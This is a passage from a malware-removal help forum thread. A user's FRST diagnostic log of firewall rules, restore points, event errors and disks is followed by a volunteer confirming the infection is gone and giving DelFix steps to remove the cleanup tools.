FirewallRules: [{D7AF3D0D-1CBF-44BA-811E-0D707B3714C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{9648780A-319E-4F53-B6E5-5BCF84E3AAB5}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{6A2824C6-31FD-48F9-94B8-0F4D466F3AD5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
08-11-2016 17:43:02 Removed Adobe Acrobat Reader DC.
08-11-2016 17:51:51 Restore Operation
08-11-2016 17:57:17 Removed Adobe Acrobat Reader DC.
08-11-2016 18:07:05 Installed Soda PDF Desktop View Module
08-11-2016 18:08:41 Installed Soda PDF Desktop Create Module
08-11-2016 18:09:38 Installed Soda PDF Desktop Forms Module
08-11-2016 18:10:04 Installed Soda PDF Desktop Secure Module
08-11-2016 18:10:45 Installed Soda PDF Desktop Edit Module
08-11-2016 18:11:18 Installed Soda PDF Desktop Review Module
08-11-2016 18:12:02 Installed Soda PDF Desktop Insert Module
08-11-2016 18:12:37 Installed Soda PDF Desktop Asian Fonts Pack
08-11-2016 18:13:21 Installed Soda PDF Desktop Convert Module
08-11-2016 18:14:42 Installed Soda PDF Desktop OCR Module
08-11-2016 18:17:08 Windows Update
12-11-2016 18:39:28 Restore Point Created by FRST
12-11-2016 19:05:39 JRT Pre-Junkware Removal
12-11-2016 19:06:30 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
Name: Photosmart Prem C310 series
Description: Photosmart Prem C310 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/12/2016 07:35:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/12/2016 07:05:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/12/2016 06:43:26 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/12/2016 06:39:28 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {5fcf9973-e6c7-4855-8bef-b51fed8202a6}
 
Error: (11/12/2016 03:43:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.18523, time stamp: 0x2a425e19
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0x00000000
Fault offset: 0x00000000
Faulting process id: 0x1b70
Faulting application start time: 0x01d23d2d4a4b06b9
Faulting application path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Faulting module path: unknown
Report Id: 07964637-a921-11e6-95c8-382c4abaa96d
 
Error: (11/12/2016 07:35:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: ole32.dll, version: 6.1.7601.23392, time stamp: 0x56eb3627
Exception code: 0xc0000005
Fault offset: 0x000000000002931b
Faulting process id: 0xbd0
Faulting application start time: 0x01d23ce82d96a68d
Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: C:\Windows\system32\ole32.dll
Report Id: e72bad1a-a8dc-11e6-95c8-382c4abaa96d
 
Error: (11/12/2016 07:26:24 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/11/2016 09:28:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 10:52:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/10/2016 05:31:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
 
System errors:
=============
Error: (11/12/2016 07:53:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Security Center service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
 
Error: (11/12/2016 07:53:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The TCP/IP NetBIOS Helper service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Restart the service.
 
Error: (11/12/2016 07:53:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The HomeGroup Provider service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (11/12/2016 07:53:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Event Log service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (11/12/2016 07:53:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The DHCP Client service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
 
Error: (11/12/2016 07:53:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Audio service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (11/12/2016 07:02:56 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: 
An instance of the service is already running.
 
Error: (11/12/2016 07:02:27 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Support Solutions Framework Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/12/2016 07:02:27 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (11/12/2016 07:02:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
 
==================== Memory info =========================== 
 
Processor: AMD FX™-4300 Quad-Core Processor 
Percentage of memory in use: 26%
Total physical RAM: 7918.12 MB
Available physical RAM: 5852.28 MB
Total Virtual: 15834.42 MB
Available Virtual: 13642.11 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:931.41 GB) (Free:860.23 GB) NTFS
Drive e: (Lexar) (Removable) (Total:7.32 GB) (Free:7.01 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 60293210)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 7.3 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.3 GB) - (Type=0C)
 
==================== End of Addition.txt ============================
 
Dale

  • 0

#6
zep516
Posted 12 November 2016 - 08:02 PM

zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Looks like kotver!gm2 is gone.

How is the computer on your end ?
  • 0

#7
dalemccollum
Posted 12 November 2016 - 08:12 PM

dalemccollum

    New Member

  • Topic Starter
  • Member
  • Pip
  • 4 posts

I haven't seen the pop up again.  Thanks SOOOO much for the help.  Have a great night!

Dale


  • 0

#8
zep516
Posted 12 November 2016 - 08:13 PM

zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Hello,

We need to remove the tools we used and then close the topic.


The following procedures will implement some cleanup procedures to remove these tools. It will also reset your System Restore by flushing out previous restore points and create a new restore point. It will also remove all the backups our tools may have made.
Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).


Why we need to remove some of our tools:
Some of the tools we have used to clean your computer were made by fellow malware fighters and are very powerful and if used incorrectly or at the wronge time can make the computer an expensive paper weight. They are updated all the time and some of them more than once a day so by the time you are ready to use them again they will already be outdated.



Download DelFix by Xplode and save it to your desktop.
  • Run the tool by right click on the 51a5ce45263de-delfix.png icon and Run as administrator option.
  • Make sure that these ones are checked:
    • Remove disinfection tools
    • Purge system restore
    • Reset system settings
  • Push Run.
  • The program will run for a few seconds and display a notepad report.
    Paste it for my review.

  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP